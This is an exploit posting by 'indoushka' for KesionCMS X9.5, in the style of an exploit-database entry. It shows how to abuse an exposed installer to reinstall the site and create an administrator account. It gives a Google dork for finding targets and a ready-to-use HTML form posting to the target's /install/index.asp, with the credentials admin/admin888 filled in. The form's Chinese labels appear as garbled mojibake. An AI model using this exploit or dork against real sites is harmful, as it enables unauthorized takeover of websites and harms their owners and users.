==================================================================================================================================== | # Title : KesionCMS X9.5 Reinstall Add Admin Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit) | | # Vendor : https://www.kesion.com/ | | # Dork : Powered by KesionCMS | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : /install/index.asp [+] http://127.0.0.1/install/?action=s4 = add your information to login [+] copy & past this exploit listed below into a text file and save it with ".html" extension [+] Exploit : [+] @t Line 09 & 16 change the domain name of target <head><title> Hacked By indoushka </title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" /> <script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script> <script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script> <script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script> </head> <body> <form name="form" method="post" action="http://127.0.0.1/install/index.asp" id="form"> <div class="guide"> <div class="guidetitle"> </div> <div class="clear"></div> </div> <div class="clear"></div> <input type="hidden" name="action" value="http://www.tzxdcpv.com/install/?action=s5" /> <input type="hidden" name="DBlx" value="" /> <input type="hidden" name="CkbData" value="" /> <input type="hidden" name="TxtDBName_a" value="" /> <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden" /> <input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" /> <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" /> <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden" /> <div id="http://www.tzxdcpv.com/install/?action=s4"> </div> <div class="clear"></div> <div class="sjlist"> <h5>ç½‘ç«™å‚æ•°é…ç½®</h5> <ul> <li><span>网站å称:</span><input name="TxtSiteName" value="科兴网络开å‘" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如:Kesion官方站</li> <li><span>网站域å:</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> åŽé¢ä¸è¦å¸¦â€œ/â€ã€‚ 如http://www.kesion.com。 </li> <li><span>安装目录:</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> åŽé¢ä¸è¦å¸¦â€œ/â€ã€‚ 系统会自动获å–,建议ä¸è¦ä¿®æ”¹ã€‚ </li> <li><span>授 æƒ ç :</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text"> å…费版本用户请留空或填“0â€ã€‚ </li> <li><span>åŽå°ç›®å½•:</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如:Manage,Admin,åŽé¢å¿…须带"/"符å·ã€‚</li> <li><span> åŽå°ç™»å½•验è¯ç :</span> <input type="radio" name="isCode_a" value="True" /> å¯ç”¨ <input type="radio" value="False" name="isCode_a" checked="checked"/> ä¸å¯ç”¨ </li> <li><span>管ç†è®¤è¯ç :</span> <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> å¯ç”¨ <input onclick="$('#rzm').hide()" type="radio" value="False" name="isCode" checked="checked" /> ä¸å¯ç”¨ <font id="rzm" style="display:none">认è¯ç :<input name="TxtManageCode" value="8888" id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li> </ul> <div class="clear"></div> <h5>填写管ç†å‘˜ä¿¡æ¯</h5> <ul> <li><span>管ç†å‘˜è´¦å·ï¼š</span><input name="TxtUserName" value="admin" id="TxtUserName" class="text" type="text"><font color="red">*</font> </li> <li><span>管ç†å‘˜å¯†ç :</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管ç†å‘˜å¯†ç ä¸èƒ½ä¸ºç©º</li> <li><span>é‡å¤å¯†ç :</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li> </ul> <div class="clear blank10"></div> <div style="padding:5px"> <input name="Button1" value="下一æ¥" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit"> </div> </div> Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | =======================================================================================================================================